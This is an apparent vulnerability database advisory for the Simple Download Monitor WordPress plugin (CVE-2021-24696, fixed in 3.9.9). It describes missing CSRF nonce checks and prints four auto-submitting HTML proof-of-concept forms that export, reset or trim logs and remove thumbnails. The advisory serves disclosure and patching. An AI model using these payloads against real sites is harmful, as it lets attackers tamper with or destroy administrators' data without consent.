WordPress Plugin Vulnerabilities

Simple Download Monitor < 3.9.9 - Multiple CSRF

Description

The plugin does not enforce nonce checks, which could allow attackers to perform CSRF attacks to 1) make admins export logs to exploit a separate log disclosure vulnerability (fixed in 3.9.6), 2) delete logs (fixed in 3.9.9), 3) remove thumbnail image from downloads

Proof of Concept

To export logs (which could then be downloaded by unauthenticated users using the Unauthenticated Log Access issue) - Fixed in 3.9.6
<form action="https://example.com/wp-admin/edit.php?post_type=sdm_downloads&page=sdm-logs&action=sdm-logs-export" method="post" id="csrf">
<input type="hidden" name="sdm_stats_start_date" value="2021-08-31">
<input type="hidden" name="sdm_stats_end_date" value="2021-08-31">
<input type="hidden" name="sdm_export_log_entries" value="1">
</form>
<script>csrf.submit()</script>

To delete logs (fixed in 3.9.9):
<form action="https://example.com/wp-admin/edit.php?post_type=sdm_downloads&page=sdm-logs" method="post" id="csrf">
<input type="hidden" name="sdm_reset_log_entries" value="1">
</form>
<script>csrf.submit()</script>

<form action="https://example.com/wp-admin/edit.php?post_type=sdm_downloads&page=sdm-logs" method="post" id="csrf">
<input type="hidden" name="sdm_trim_log_entries" value="1">
<!-- older than 0 days = basically all -->
<input type="hidden" name="sdm_trim_log_entries_day" value="0">
</form>
<script>csrf.submit()</script>


To remove thumbnail image from downloads (fixed in 3.9.9)
<form action="https://example.com/wp-admin/admin-ajax.php" method="post" id="csrf">
<input type="hidden" name="action" value="sdm_remove_thumbnail_image">
<!-- assuming download 612 has thumbnail -->
<input type="hidden" name="post_id_del" value="612">
</form>
<script>csrf.submit()</script>

Affects Plugins

Plugin icon
simple-download-monitor
Fixed in 3.9.9

References

CVE
CVE-2021-24696

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
e94772af-39ac-4743-a556-52351ebda9fe

Timeline

Publicly Published
2021-12-21 (about 2 years ago)
Added
2021-12-21 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2022-04-15
Title
Simple Ajax Chat < 20220216 - Log Clearing & Arbitrary Chat Message Deletion via CSRF
Published
2022-05-23
Title
WP-chgFontSize <= 1.8 - Arbitrary Settings Update via CSRF to Stored XSS
Published
2014-08-01
Title
Featured Comments 1.2.1 - wp-admin/admin-ajax.php Comment Status Manipulation CSRF
Published
2021-09-04
Title
Media File Renamer - Auto & Manual Rename < 5.2.7 - Media Title/Filename/Locking State Update via CSRF
Published
2023-11-28
Title
Razorpay for WooCommerce < 4.5.7 - Transfers Manipulation via CSRF